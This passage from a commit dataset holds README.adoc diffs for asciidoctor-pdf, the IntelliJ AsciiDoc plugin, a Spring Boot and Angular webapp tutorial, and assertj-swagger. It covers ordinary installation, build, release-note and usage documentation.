`icons` attribute to the `asciidoctor-pdf` command.\n\n $ asciidoctor-pdf -a icons=font -a icon-set=octicon sample.adoc\n\nIcon-based fonts are handled by the `prawn-icon` gem.\nTo find a complete list of available icons, consult the https:\/\/github.com\/jessedoyle\/prawn-icon\/tree\/master\/data\/fonts[prawn-icon] repository.\n\n== Optional scripts\n\n{project-name} also provides a shell script that invokes GhostScript (`gs`) to optimize and compress the generated PDF with minimal impact on quality.\nYou must have Ghostscript installed to use it.\n\nHere's an example usage:\n\n $ .\/bin\/optimize-pdf basic-example.pdf\n\nThe command will generate the file [file]_example-optimized.pdf_ in the current directory.\n\nWARNING: The `optimize-pdf` script currently requires a Bash shell (Linux, OSX, etc).\nWe plan to rewrite the script in Ruby so it works across platforms (see https:\/\/github.com\/asciidoctor\/asciidoctor-pdf\/issues\/1[issue #1])\n\nIMPORTANT: The `optimize-pdf` script relies on Ghostscript >= 9.10.\nOtherwise, it may actually make the PDF larger.\nAlso, you should only consider using it if the file size of the original PDF is > 5MB.\n\nIf a file is found with the extension `.pdfmarks` and the same rootname as the input file, it is used to add metadata to the generated PDF document.\nThis file is necessary to preserve the document metadata since Ghostscript will otherwise drop it.\nThat's why {project-name} always creates this file in addition to the PDF.\n\n== Contributing\n\nIn the spirit of free software, _everyone_ is encouraged to help improve this project.\n\nTo contribute code, simply fork the project on GitHub, hack away and send a pull request with your proposed changes.\n\nFeel free to use the {uri-project-issues}[issue tracker] or {uri-project-list}[Asciidoctor mailing list] to provide feedback or suggestions in other ways.\n\n== Development\n\nTo help develop {project-name}, or to simply use the development version, you need to get the source from GitHub.\nFollow the instructions below to learn how to clone the source and run it from your local copy.\n\n=== Retrieve the source code\n\nYou can retrieve the source of {project-name} in one of two ways:\n\n. Clone the git repository\n. Download a zip archive of the repository\n\n==== Option 1: Fetch using git clone\n\nIf you want to clone the git repository, simply copy the {uri-project-repo}[GitHub repository URL] and pass it to `git clone` command:\n\n $ git clone https:\/\/github.com\/asciidoctor\/asciidoctor-pdf\n\nNext, change to the project directory:\n\n $ cd asciidoctor-pdf\n\n==== Option 2: Download the archive\n\nIf you want to download a zip archive, click the btn:[Download Zip] button on the right-hand side of the repository page on GitHub.\nOnce the download finishes, extract the archive, open a console and change to that directory.\n\nTIP: Instead of working out of the {project-handle} directory, you can simply add the absolute path of the [path]_bin_ directory to your `PATH` environment variable.\n\nWe'll leverage the project configuration to install the necessary dependencies.\n\n=== Install dependencies\n\nIf you're using {uri-rvm}[RVM], we recommend creating a new gemset to work with {project-name}:\n\n $ rvm use 2.2@asciidoctor-pdf --create\n\nWe like RVM because it keeps the dependencies required by various projects isolated.\n\nThe dependencies needed to use {project-name} are defined in the [file]_Gemfile_ at the root of the project.\nWe can use Bundler to install the dependencies for us.\n\nTo check you have Bundler available, use the `bundle` command to query the version installed:\n\n $ bundle --version\n\nIf it's not installed, use the `gem` command to install it.\n\n $ gem install bundler\n\nThen use the `bundle` command to install the project dependencies:\n\n $ bundle\n\nNOTE: You need to call `bundle` from the project directory so that it can find the [file]_Gemfile_.\n\nAssuming all the required gems install properly, verify you can run the `asciidoctor-pdf` script using Ruby:\n\n $ ruby .\/bin\/asciidoctor-pdf -v\n\nor\n\n $ bundle exec .\/bin\/asciidoctor-pdf -v\n\nIf you see the version of {project-name} printed, you're ready to use {project-name}!\n\nCAUTION: If you get an error message--and you're not using a Ruby manager like RVM--you may need to invoke the script through `bundle exec`:\nFor best results, be sure to always use `bundle exec` whenever invoking the `.\/bin\/asciidoctor-pdf` script in development mode.\n\n[[resources,Links]]\n== Resources\n\n* https:\/\/groups.google.com\/forum\/#!msg\/prawn-ruby\/MbMsCx862iY\/6ImCsvLGfVcJ[Discussion about image quality in PDFs]\n\n== Authors\n\n{project-name} was written by https:\/\/github.com\/mojavelinux[Dan Allen] and https:\/\/github.com\/graphitefriction[Sarah White] of OpenDevise Inc. on behalf of the Asciidoctor Project.\n\n== Copyright\n\nCopyright (C) 2014-2015 OpenDevise Inc. and the Asciidoctor Project.\nFree use of this software is granted under the terms of the MIT License.\n\nFor the full text of the license, see the <<LICENSE.adoc#,LICENSE>> file.\nRefer to the <<NOTICE.adoc#,NOTICE>> file for information about third-party Open Source software in use.\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"bb235a7215d5806d96659db0948703e2b47e3bbd","subject":"make heading bold","message":"make heading bold\n","repos":"asciidoctor\/asciidoctor-intellij-plugin,asciidoctor\/asciidoctor-intellij-plugin,asciidoctor\/asciidoctor-intellij-plugin,asciidoctor\/asciidoctor-intellij-plugin,asciidoctor\/asciidoctor-intellij-plugin","old_file":"README.adoc","new_file":"README.adoc","new_contents":"= IntelliJ AsciiDoc Plugin\nErik Pragt\n:experimental:\n\nA plugin for the IntelliJ platform (IntelliJ IDEA, RubyMine, etc) that provides support for the http:\/\/www.asciidoc.org[AsciiDoc] markup language. You can install the plugin (named \"AsciiDoc\") from the plugins section inside your Jetbrains IDE or download it from the https:\/\/plugins.jetbrains.com\/plugin\/7391[Jetbrains Plugin Repository].\n\nimage::https:\/\/hacktoberfest.digitalocean.com\/assets\/logo-hacktoberfest-658b5aa2bd34e782d29c40bf6afbdff00f20fe1328efa6da17743878ba8db66f.png[float=left,width=200]\n\n*This plugin joined https:\/\/hacktoberfest.digitalocean.com\/[Hacktoberfest]!\nIssues that can give you a start are https:\/\/github.com\/asciidoctor\/asciidoctor-intellij-plugin\/issues?q=is%3Aissue+is%3Aopen+label%3AHacktoberfest[marked with the label \"Hacktoberfest\"], but you can choose any ticket you want to participate (and even create pull requests without a prior ticket).\nIf you want to discuss ideas and create pull requests you can meet Alexander, one of the maintainers, at the https:\/\/www.eventbrite.com\/e\/hacktoberfest-frankfurt-2018-tickets-50225231018[Frankfurt\/Main Hacktober Fest in Germany on October 12th].*\n\nIf you want to use the JavaFX instead of the Swing preview, you'll need to run IntelliJ with 64bit Java.\nFrom 2017.1 onwards 64bit Java is included even in the Windows versions.\nPlease only use the JDK provided by JetBrains, as the JavaFX rendering seems to be most stable in the JetBrains JDK.\n\n== Release notes\n\n=== 0.21.1\n\n- allow attributes to be pre-defined in plugin settings (#216)\n\n=== 0.21.0 (preview, available from Github releases)\n\n- Update to AsciidoctorJ 1.5.7 and Asciidoctor Diagram 1.5.9\n- Treat \"line must be non negative\" only as a warning (#212)\n\n=== 0.20.6\n\n- Display all PlantUML graphics as PNG for preview (#170)\n\n=== 0.20.5\n\n- Adding hiDPI support for JavaFX preview (#125)\n\n=== 0.20.4\n\n- Requiring 2017.1 as minimum for this plugin (#207)\n\n=== 0.20.3 (preview, available from Github releases)\n\n- Avoiding deadlock on JavaFX initialization (#207)\n- Requiring 2017.2 as minimum for this plugin\n\n=== 0.20.2\n\n- Dejavu fonts now display chinese characters within tables (#203)\n\n=== 0.20.1\n\n- Upgrading to asciidoctorj-diagram 1.5.8\n- Dejavu fonts now display chinese characters (#203)\n\n=== 0.20.0\n\n- Add MathJax support in JavaFX preview #201\n- JavaFX preview is now the default for new installations of the plugin\n- Include DejaVu fonts for improved and consistent preview #184\n\n=== 0.19.2\n\n- Fix NullPointerExceptions when used with IntelliJ Language Injection and Fragment Editor #194\n\n=== 0.19.1\n\n- Support inspections to convert markdown and old style AsciiDoc headings to modern AsciiDoc headings #185\n- JRuby runtime updated to 9.1.8.0 to work with recent JDK versions (still, internal Jetbrains JRE is the only supported version) #187\n\n=== 0.19.0\n\n- Support Icon fonts (thanks to @matthiasbalke) \/ #182\n- Update to asciidoctorj-1.5.6 (aka asciidoctor-1.5.6.1) and asciidoctorj-diagram-1.5.4.1\n- Support \"search everywhere\" (double Shift) and \"goto by name - Symbol...\" (Ctrl+Shift+Alt+N) for all AsciiDoc section headings - just enter a part of the heading\n- Support Markdown style sections (starting with '#') in syntax highlighting\n\n=== 0.18.2 (preview, available from Github releases)\n\n- Headings in Darcula theme preview are now light grey for better readability\n\n=== 0.18.1\n\n- Improved handling for non-printable characters in syntax highlighting\n\n=== 0.18.0 (preview, available from Github releases)\n\n- Update to asciidoctor 1.5.5\/asciidoctor-diagram 1.5.4\n- Capture Asciidoctor messages on stdout\/stderr and write them to IDE notifications\n- Close files when images are shown in preview\n- Set focus in editor when re-opening file\n- Fix \"line must be non negative\" error when clicking on preview\n\n=== 0.17.3\n\n- Make click-on-link-to-open and click-on-preview-to-set-cursor in JavaFX preview compatible with Java 8 u111+\n- Formatting actions from the toolbar should not throw exceptions when triggered at the beginning or end of the document\n\n=== 0.17.2\n\n- Plugin is now build using the https:\/\/gradle.org\/[Gradle] and https:\/\/github.com\/JetBrains\/gradle-intellij-plugin[gradle-intellij-plugin]\nThis should make contributing and releasing easier. Thanks Jiawen Geng!\n- Asciidoctor's temporary files are now created in a temporary folder per opened document. Thanks @agorges!\n\n=== 0.17.1 (preview, available from Github releases)\n\n- Improved handling of trailing spaces in syntax highlighting.\n- Fixed code\/preview sync for nested HTML (i.e. NOTE)\n\n=== 0.17.0 (preview, available from Github releases)\n\n- Updated block parsing to support two styles of headings.\n- Block starts and ends are need to be aligned in length and shape when parsed.\n\n=== 0.16.4\n\n- Improved darcula support for JavaFX. More block types are using proper dark background and light text colors.\n\n=== 0.16.3\n\n- Theme in preview can be switched from light to darcula independent of IDE theme\n\n=== 0.16.2\n\n- Handling of Linux and MacOS file names for image preview in JavaFX\n\n=== 0.16.1\n\n- Added darcula theme for JavaFX preview\n- Clicking on JavaFX preview will set cursor position in editor (thanks to @kastork for the idea)\n\n=== 0.15.4\n\n- setScene now called from FxThread instead of AWT thread to avoid blocking GUI on MacOS\n\n=== 0.15.3\n\n- Initialization message appears only during initialization\n- No error message if user switches to a setup where JavaFX preview is no longer available.\n\n=== 0.15.2 (preview, available from Github releases)\n\n- fixed detection of Mac 64 JVM to be able to activate JavaFX preview\n- click-on-url for JavaFX improved, when slow-loading external images are referenced\n\n=== 0.15.1 (preview, available from Github releases)\n\n- revised constrained\/unconstrained detection\n- Fix problem in syntax highlighting leading to PSI Parser Exceptions\n- refreshing images on JavaFX only if their content has changed to save memory consumption\n- Limiting JavaFX preview to 64bit platforms due to problems especially with Windows OpenJDK 32bit (as default on Windows).\n\n=== 0.15.0 (preview, available from Github releases)\n\n- correct usage of constrained\/unconstrained AsciiDoc formatting\n- JavaFX Preview will automatically scroll to the cursor position of the editor\n- JavaFX preview will automatically open links in the systems's default browser\n- Caching rendering instances of Asciidoctor for better performance\n\nIntelliJ 15 (including AppCode 3.3, CLion 1.2, DataGrip 1.0, PhpStorm 10, PyCharm 5, RubyMine 8, WebStorm 11) is the new minimum version required for this release.\n\n=== 0.14.3\n\n- Fix problem in syntax highlighting leading to PSI Parser Exceptions\n- disable automatically refreshing images on JavaFX (to be re-enabled in 0.15.x)\n\n=== 0.14.2\n\n- Performance improvement: render preview only when visible\n- Don't show AsciiDoc preview actions in other Editors\n- additional compatibility fixes for IntelliJ 15.x\n\n=== 0.14.1\n\n- make compatible with IntelliJ 15.x again. +\n This should include: AppCode 3.3, CLion 1.2, DataGrip 1.0, PhpStorm 10, PyCharm 5, RubyMine 8, WebStorm 11\n\n=== 0.14\n\n- New JavaFX preview and real split view\n- Update to asciidoctorj 1.5.4.1 and asciidoctorj-diagram 1.5.0\n\n=== 0.13\n\n- Updated to asciidoctorj 1.5.3.2, added support for asciidoctor-diagram\n\n=== 0.12\n\n- Bugfixes, new makelink action, table generation improvement, etc.\n\n=== 0.11\n\n- Removed AsciiDoc item in right click menu thanks to Dmitry Jemerov.\n- Added 'Open in Browser' menu item.\n- Added 40+ live template (access them by pressing Cmd+J, or type 'ad-')\n\n== Features\n\n* Since 0.8 Fixed incompatibility with non-IDEA IDE's, thanks to Harro Lissenberg\n* Since 0.7: Right click on a document to apply basic formatting or create tables.\n* Since 0.6: refactor Markdown to AsciiDoc. Right click on a file, or use the Refactor menu, and the Markdown document\nwill be replaced by the AsciiDoc equivalent. Also supports undo, in case you're not happy with the result!\n* Since 0.4: recognizes the AsciiDoc file extension (.adoc, .asciidoc, .ad)\n* Since 0.4: provides a two-pane AsciiDoc preview editor based on https:\/\/github.com\/asciidoctor\/asciidoctorj[AsciidoctorJ] with Live preview.\n\nIf you are missing features, please don't hesitate to let me know on Twitter: http:\/\/www.twitter.com\/epragt[@epragt] or make an issue in the issue tracker!\n\n== Dependencies\n\nThis project uses AsciiDoctorJ and JRuby for the rendering of the AsciiDoc content.\n\nFor the conversion of Markdown to AsciiDoc, we use Pegdown and the https:\/\/github.com\/bodiam\/markdown-to-asciidoc[Markdown to AsciiDoc] converter.\n\n== Build\n\nThis plugin is built using Gradle.\nIf you build or run it the first time it will download the community edition of IntelliJ automatically.\n\nIf you have developed the plugin before it changed to Gradle you might want to remove the contents of your `.idea` folder to trigger a re-import of the Gradle project.\n\nTo build this plugin, you need to run:\n\n----\n.\/gradlew -Dfile.encoding=UTF-8 buildPlugin\n----\n\nThe ZIP file with plugin to distribute will be located in `build\/distributions`.\n\nTo run the plugin for development you'll need to start\n\n----\n.\/gradlew -Dfile.encoding=UTF-8 runIde\n----\n\n== Copyright and Licensing\n\nCopyright (C) 2013-2017 Julien Viet and Erik Pragt.\nReleased under the Apache License, Version 2.0 (see link:LICENSE[LICENSE]).\n\n== Credits\n\nThis plugin is based on the https:\/\/github.com\/nicoulaj\/idea-markdown[Intellij Markdown plugin by Julien Nicoulaud].\n\nAlso, great help was received from Harro Lissenberg, Alexander Schwartz and Dan Allen. Thank you all for your support!\n","old_contents":"= IntelliJ AsciiDoc Plugin\nErik Pragt\n:experimental:\n\nA plugin for the IntelliJ platform (IntelliJ IDEA, RubyMine, etc) that provides support for the http:\/\/www.asciidoc.org[AsciiDoc] markup language. You can install the plugin (named \"AsciiDoc\") from the plugins section inside your Jetbrains IDE or download it from the https:\/\/plugins.jetbrains.com\/plugin\/7391[Jetbrains Plugin Repository].\n\nimage::https:\/\/hacktoberfest.digitalocean.com\/assets\/logo-hacktoberfest-658b5aa2bd34e782d29c40bf6afbdff00f20fe1328efa6da17743878ba8db66f.png[float=left,width=200]\n\nThis plugin joined https:\/\/hacktoberfest.digitalocean.com\/[Hacktoberfest]!\nIssues that can give you a start are https:\/\/github.com\/asciidoctor\/asciidoctor-intellij-plugin\/issues?q=is%3Aissue+is%3Aopen+label%3AHacktoberfest[marked with the label \"Hacktoberfest\"], but you can choose any ticket you want to participate (and even create pull requests without a prior ticket).\nIf you want to discuss ideas and create pull requests you can meet Alexander, one of the maintainers, at the https:\/\/www.eventbrite.com\/e\/hacktoberfest-frankfurt-2018-tickets-50225231018[Frankfurt\/Main Hacktober Fest in Germany on October 12th].\n\nIf you want to use the JavaFX instead of the Swing preview, you'll need to run IntelliJ with 64bit Java.\nFrom 2017.1 onwards 64bit Java is included even in the Windows versions.\nPlease only use the JDK provided by JetBrains, as the JavaFX rendering seems to be most stable in the JetBrains JDK.\n\n== Release notes\n\n=== 0.21.1\n\n- allow attributes to be pre-defined in plugin settings (#216)\n\n=== 0.21.0 (preview, available from Github releases)\n\n- Update to AsciidoctorJ 1.5.7 and Asciidoctor Diagram 1.5.9\n- Treat \"line must be non negative\" only as a warning (#212)\n\n=== 0.20.6\n\n- Display all PlantUML graphics as PNG for preview (#170)\n\n=== 0.20.5\n\n- Adding hiDPI support for JavaFX preview (#125)\n\n=== 0.20.4\n\n- Requiring 2017.1 as minimum for this plugin (#207)\n\n=== 0.20.3 (preview, available from Github releases)\n\n- Avoiding deadlock on JavaFX initialization (#207)\n- Requiring 2017.2 as minimum for this plugin\n\n=== 0.20.2\n\n- Dejavu fonts now display chinese characters within tables (#203)\n\n=== 0.20.1\n\n- Upgrading to asciidoctorj-diagram 1.5.8\n- Dejavu fonts now display chinese characters (#203)\n\n=== 0.20.0\n\n- Add MathJax support in JavaFX preview #201\n- JavaFX preview is now the default for new installations of the plugin\n- Include DejaVu fonts for improved and consistent preview #184\n\n=== 0.19.2\n\n- Fix NullPointerExceptions when used with IntelliJ Language Injection and Fragment Editor #194\n\n=== 0.19.1\n\n- Support inspections to convert markdown and old style AsciiDoc headings to modern AsciiDoc headings #185\n- JRuby runtime updated to 9.1.8.0 to work with recent JDK versions (still, internal Jetbrains JRE is the only supported version) #187\n\n=== 0.19.0\n\n- Support Icon fonts (thanks to @matthiasbalke) \/ #182\n- Update to asciidoctorj-1.5.6 (aka asciidoctor-1.5.6.1) and asciidoctorj-diagram-1.5.4.1\n- Support \"search everywhere\" (double Shift) and \"goto by name - Symbol...\" (Ctrl+Shift+Alt+N) for all AsciiDoc section headings - just enter a part of the heading\n- Support Markdown style sections (starting with '#') in syntax highlighting\n\n=== 0.18.2 (preview, available from Github releases)\n\n- Headings in Darcula theme preview are now light grey for better readability\n\n=== 0.18.1\n\n- Improved handling for non-printable characters in syntax highlighting\n\n=== 0.18.0 (preview, available from Github releases)\n\n- Update to asciidoctor 1.5.5\/asciidoctor-diagram 1.5.4\n- Capture Asciidoctor messages on stdout\/stderr and write them to IDE notifications\n- Close files when images are shown in preview\n- Set focus in editor when re-opening file\n- Fix \"line must be non negative\" error when clicking on preview\n\n=== 0.17.3\n\n- Make click-on-link-to-open and click-on-preview-to-set-cursor in JavaFX preview compatible with Java 8 u111+\n- Formatting actions from the toolbar should not throw exceptions when triggered at the beginning or end of the document\n\n=== 0.17.2\n\n- Plugin is now build using the https:\/\/gradle.org\/[Gradle] and https:\/\/github.com\/JetBrains\/gradle-intellij-plugin[gradle-intellij-plugin]\nThis should make contributing and releasing easier. Thanks Jiawen Geng!\n- Asciidoctor's temporary files are now created in a temporary folder per opened document. Thanks @agorges!\n\n=== 0.17.1 (preview, available from Github releases)\n\n- Improved handling of trailing spaces in syntax highlighting.\n- Fixed code\/preview sync for nested HTML (i.e. NOTE)\n\n=== 0.17.0 (preview, available from Github releases)\n\n- Updated block parsing to support two styles of headings.\n- Block starts and ends are need to be aligned in length and shape when parsed.\n\n=== 0.16.4\n\n- Improved darcula support for JavaFX. More block types are using proper dark background and light text colors.\n\n=== 0.16.3\n\n- Theme in preview can be switched from light to darcula independent of IDE theme\n\n=== 0.16.2\n\n- Handling of Linux and MacOS file names for image preview in JavaFX\n\n=== 0.16.1\n\n- Added darcula theme for JavaFX preview\n- Clicking on JavaFX preview will set cursor position in editor (thanks to @kastork for the idea)\n\n=== 0.15.4\n\n- setScene now called from FxThread instead of AWT thread to avoid blocking GUI on MacOS\n\n=== 0.15.3\n\n- Initialization message appears only during initialization\n- No error message if user switches to a setup where JavaFX preview is no longer available.\n\n=== 0.15.2 (preview, available from Github releases)\n\n- fixed detection of Mac 64 JVM to be able to activate JavaFX preview\n- click-on-url for JavaFX improved, when slow-loading external images are referenced\n\n=== 0.15.1 (preview, available from Github releases)\n\n- revised constrained\/unconstrained detection\n- Fix problem in syntax highlighting leading to PSI Parser Exceptions\n- refreshing images on JavaFX only if their content has changed to save memory consumption\n- Limiting JavaFX preview to 64bit platforms due to problems especially with Windows OpenJDK 32bit (as default on Windows).\n\n=== 0.15.0 (preview, available from Github releases)\n\n- correct usage of constrained\/unconstrained AsciiDoc formatting\n- JavaFX Preview will automatically scroll to the cursor position of the editor\n- JavaFX preview will automatically open links in the systems's default browser\n- Caching rendering instances of Asciidoctor for better performance\n\nIntelliJ 15 (including AppCode 3.3, CLion 1.2, DataGrip 1.0, PhpStorm 10, PyCharm 5, RubyMine 8, WebStorm 11) is the new minimum version required for this release.\n\n=== 0.14.3\n\n- Fix problem in syntax highlighting leading to PSI Parser Exceptions\n- disable automatically refreshing images on JavaFX (to be re-enabled in 0.15.x)\n\n=== 0.14.2\n\n- Performance improvement: render preview only when visible\n- Don't show AsciiDoc preview actions in other Editors\n- additional compatibility fixes for IntelliJ 15.x\n\n=== 0.14.1\n\n- make compatible with IntelliJ 15.x again. +\n This should include: AppCode 3.3, CLion 1.2, DataGrip 1.0, PhpStorm 10, PyCharm 5, RubyMine 8, WebStorm 11\n\n=== 0.14\n\n- New JavaFX preview and real split view\n- Update to asciidoctorj 1.5.4.1 and asciidoctorj-diagram 1.5.0\n\n=== 0.13\n\n- Updated to asciidoctorj 1.5.3.2, added support for asciidoctor-diagram\n\n=== 0.12\n\n- Bugfixes, new makelink action, table generation improvement, etc.\n\n=== 0.11\n\n- Removed AsciiDoc item in right click menu thanks to Dmitry Jemerov.\n- Added 'Open in Browser' menu item.\n- Added 40+ live template (access them by pressing Cmd+J, or type 'ad-')\n\n== Features\n\n* Since 0.8 Fixed incompatibility with non-IDEA IDE's, thanks to Harro Lissenberg\n* Since 0.7: Right click on a document to apply basic formatting or create tables.\n* Since 0.6: refactor Markdown to AsciiDoc. Right click on a file, or use the Refactor menu, and the Markdown document\nwill be replaced by the AsciiDoc equivalent. Also supports undo, in case you're not happy with the result!\n* Since 0.4: recognizes the AsciiDoc file extension (.adoc, .asciidoc, .ad)\n* Since 0.4: provides a two-pane AsciiDoc preview editor based on https:\/\/github.com\/asciidoctor\/asciidoctorj[AsciidoctorJ] with Live preview.\n\nIf you are missing features, please don't hesitate to let me know on Twitter: http:\/\/www.twitter.com\/epragt[@epragt] or make an issue in the issue tracker!\n\n== Dependencies\n\nThis project uses AsciiDoctorJ and JRuby for the rendering of the AsciiDoc content.\n\nFor the conversion of Markdown to AsciiDoc, we use Pegdown and the https:\/\/github.com\/bodiam\/markdown-to-asciidoc[Markdown to AsciiDoc] converter.\n\n== Build\n\nThis plugin is built using Gradle.\nIf you build or run it the first time it will download the community edition of IntelliJ automatically.\n\nIf you have developed the plugin before it changed to Gradle you might want to remove the contents of your `.idea` folder to trigger a re-import of the Gradle project.\n\nTo build this plugin, you need to run:\n\n----\n.\/gradlew -Dfile.encoding=UTF-8 buildPlugin\n----\n\nThe ZIP file with plugin to distribute will be located in `build\/distributions`.\n\nTo run the plugin for development you'll need to start\n\n----\n.\/gradlew -Dfile.encoding=UTF-8 runIde\n----\n\n== Copyright and Licensing\n\nCopyright (C) 2013-2017 Julien Viet and Erik Pragt.\nReleased under the Apache License, Version 2.0 (see link:LICENSE[LICENSE]).\n\n== Credits\n\nThis plugin is based on the https:\/\/github.com\/nicoulaj\/idea-markdown[Intellij Markdown plugin by Julien Nicoulaud].\n\nAlso, great help was received from Harro Lissenberg, Alexander Schwartz and Dan Allen. Thank you all for your support!\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"bc1a087063215ce988c1de3a94745e597440e97d","subject":"updated readme","message":"updated readme\n","repos":"toedter\/webapp-tutorial,toedter\/webapp-tutorial,toedter\/webapp-tutorial,toedter\/webapp-tutorial","old_file":"README.adoc","new_file":"README.adoc","new_contents":"= WebApp Tutorial\n\nThis is tutorial material for building web apps with Spring Boot, Spring Data Rest, AnguluarJS and TypeScript.\n\n== Used Technologies\n\n* http:\/\/www.oracle.com\/technetwork\/java\/javase\/downloads\/jdk8-downloads-2133151.html[Java 8] for the REST services\n* https:\/\/www.typescriptlang.org\/[Typescript] for the web client\n* http:\/\/stateless.co\/hal_specification.html[HAL] (Hypertext Application Language) fpr hypermedia\n* http:\/\/projects.spring.io\/spring-boot\/[Spring Boot] (+ Data, REST, HATEOAS)\n* http:\/\/angular.io\/[Angular 2] for web client\n* http:\/\/junit.org\/[JUnit] for Java unit and integration testing\n* https:\/\/code.google.com\/p\/mockito\/[Mockito] for Mocking\n* http:\/\/www.gradle.org\/[Gradle] as build system\n* Node.js, npm, Bower, typings, webpack for the web client build\n\n== Requirements\n\n* Java 8 (JDK) installed\n\nYou don't need to install Node.js and all the JavaScript tooling,\nsince those tools are installed automatocally by the Gradle build.\nBut it would be convenient to have those tolls installed\nif you want to use theme directly instead of using the Gradle wrapper tasks.\n\n* Optional\n** Node.js and npm installed\n** TypeScript installed (npm install -g typescript)\n** Bower installed (npm install -g bower)\n** Typings installed (npm install -g typings)\n\nIn the vagrant directory you find a Vagrantfile to create a (German) development environment.\n\n* Install Vagrant and VirtualBox\n* Invoke \"vagrant up\" in a terminal\n* Wait for 20 minutes letting Vagrant create the whole virtual machine\n* In the VM, log in as vagrant\/vagrant and then invoke: startx\n* The latest Ubuntu with a simple desktop will start up\n* You find this project at \/home\/vagrant\/webapp-tutorial\n* All Gradle and JavaScript dependencies are already in the VM\n* You find an IntelliJ IDEA trial under \/opt\n* Before starting IntelliJ you have to configure the Java 8 JDK\n* After starting IntelliJ you have to install the Lombok plugin manually.\n\n== Getting Started\n\nWhen you want to run the tutorial locally, prepare all the labs:\n\n* .\/gradlew prepareJs (installs all node modules, typings and other dependencies in all labs)\n* .\/gradlew clean build (builds all the tutorial labs (Java parts + JavaScript parts), runs all the Java tests)\n","old_contents":"= WebApp Tutorial\n\nThis is tutorial material for building web apps with Spring Boot, Spring Data Rest, AnguluarJS and TypeScript.\n\n== Used Technologies\n\n* Java 7 or 8\n* http:\/\/stateless.co\/hal_specification.html[HAL] (Hypertext Application Language)\n* http:\/\/projects.spring.io\/spring-boot\/[Spring Boot] (+ Data, REST, HATEOAS)\n* http:\/\/www.typescriptlang.org\/[TypeScript] for web client\n* http:\/\/angularjs.org\/[AngularJS] for web client\n* http:\/\/junit.org\/[JUnit] for Java unit and integration testing\n* https:\/\/code.google.com\/p\/mockito\/[Mockito] for Mocking\n* http:\/\/www.gradle.org\/[Gradle] as build system\n* NPM, Grunt, Bower, TSG for the web client build\n\n== Requirements\n\n* Java 7 or 8 (JDK) installed\n* Node.js installed\n** Grunt CLI installed (npm install -g grunt-cli)\n** Bower installed (npm install -g bower)\n** TSD installed (npm install -g tsd)\n\nIn the vagrant directory you find a Vagrantfile to create a (German) development environment.\n\n* Install Vagrant and VirtualBox\n* Invoke \"vagrant up\" in a terminal\n* Wait for 20 minutes letting Vagrant create the whole virtual machine\n* In the VM, log in as vagrant\/vagrant and then invoke: startx\n* The latest Ubuntu with a simple desktop will start up\n* You find this project at \/home\/vagrant\/webapp-tutorial\n* All Gradle and JavaScript dependencies are already in the VM\n* You find an IntelliJ IDEA trial under \/opt\n* Before starting IntelliJ you have to configure the Java 8 JDK\n* After starting IntelliJ you have to install the Lombok plugin manually.\n\n== Getting Started\n\nWhen you want to run the tutorial locally, prepare all the labs:\n\n* .\/gradlew prepareJs (invokes npm install, bower install, tsd reinstall on all JavaScript projects)\n* .\/gradlew clean build (builds all the tutorial labs (Java parts), runs all the Java tests)\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"242fec91565e71327005572d4f3ac0070060323e","subject":"Updated documentation","message":"Updated documentation","repos":"thomsonreuters\/assertj-swagger,RobWin\/assertj-swagger","old_file":"README.adoc","new_file":"README.adoc","new_contents":"= assertj-swagger\n:author: Robert Winkler\n:version: 0.1.1\n:hardbreaks:\n\nimage:https:\/\/travis-ci.org\/RobWin\/assertj-swagger.svg[\"Build Status\", link=\"https:\/\/travis-ci.org\/RobWin\/assertj-swagger\"] image:https:\/\/coveralls.io\/repos\/RobWin\/assertj-swagger\/badge.svg?branch=master[\"Coverage Status\", link=\"https:\/\/coveralls.io\/r\/RobWin\/assertj-swagger\"] image:https:\/\/api.bintray.com\/packages\/robwin\/maven\/assertj-swagger\/images\/download.svg[link=\"https:\/\/bintray.com\/robwin\/maven\/assertj-swagger\/_latestVersion\"] image:http:\/\/img.shields.io\/badge\/license-ASF2-blue.svg[\"Apache License 2\", link=\"http:\/\/www.apache.org\/licenses\/LICENSE-2.0.txt\"]\n\n== Overview\n\nassertj-swagger is a https:\/\/github.com\/joel-costigliola\/assertj-core[assertj] library which compares a contract-first https:\/\/github.com\/swagger-api\/swagger-spec[Swagger] YAML\/JSON file with a code-first Swagger JSON output (e.g. from https:\/\/github.com\/springfox\/springfox[springfox] or https:\/\/github.com\/swagger-api\/swagger-core\/wiki\/Java-JAXRS-Quickstart[JAX-RS Swagger]). assertj-swagger allows to validate that the API implementation is in compliance with the contract specification. The library supports the Swagger 1.2 and 2.0 specification for the code-first Swagger JSON, but only 2.0 for the contract-first Swagger file.\nassertj-swagger compares Swagger objects like Paths, Parameters and Definitions. It does not compare __unimportant__ Swagger objects like info, descriptions or summaries.\n\n== Usage guide\n\n=== Adding assertj-swagger to your project\nThe project is published in JCenter and Maven Central.\n\n==== Maven\n\n[source,xml]\n----\n<repositories>\n <repository>\n <snapshots>\n <enabled>false<\/enabled>\n <\/snapshots>\n <id>central<\/id>\n <name>bintray<\/name>\n <url>http:\/\/jcenter.bintray.com<\/url>\n <\/repository>\n<\/repositories>\n\n<dependency>\n <groupId>io.github.robwin<\/groupId>\n <artifactId>assertj-swagger<\/artifactId>\n <version>0.1.1<\/version>\n<\/dependency>\n----\n\n==== Gradle\n\n[source,groovy]\n----\nrepositories {\n jcenter()\n}\n\ncompile \"io.github.robwin:assertj-swagger:0.1.1\"\n----\n\n=== Using assertj-swagger in an integration test\n\nUsing assertj-swagger is simple. For example, if you are using https:\/\/github.com\/spring-projects\/spring-boot[Spring Boot] and https:\/\/github.com\/springfox\/springfox[springfox] or https:\/\/github.com\/swagger-api\/swagger-core\/wiki\/Java-JAXRS-Quickstart[JAX-RS Swagger], you can validate your Swagger JSON in an integration test.\n\n[source, java]\n----\n@RunWith(SpringJUnit4ClassRunner.class)\n@SpringApplicationConfiguration(classes = Application.class)\n@IntegrationTest\n@WebAppConfiguration\npublic class AssertjSwaggerTest {\n @Test\n public void validateThatImplementationFitsDesignSpecification(){\n String designFirstSwagger = SwaggerAssertTest.class.getResource(\"\/swagger.yaml\").getPath();\n SwaggerAssertions.assertThat(\"http:\/\/localhost:8080\/v2\/api-docs\")\n .isEqualTo(designFirstSwagger);\n }\n}\n----\n\n==== Example output\n\nAssertj-swagger fails a test if it finds differences between the implementation and the specification.\n\n[source]\n----\nThe following 4 assertions failed:\n1) [Checking Paths] \nExpecting:\n <[\"\/api\/pet\", 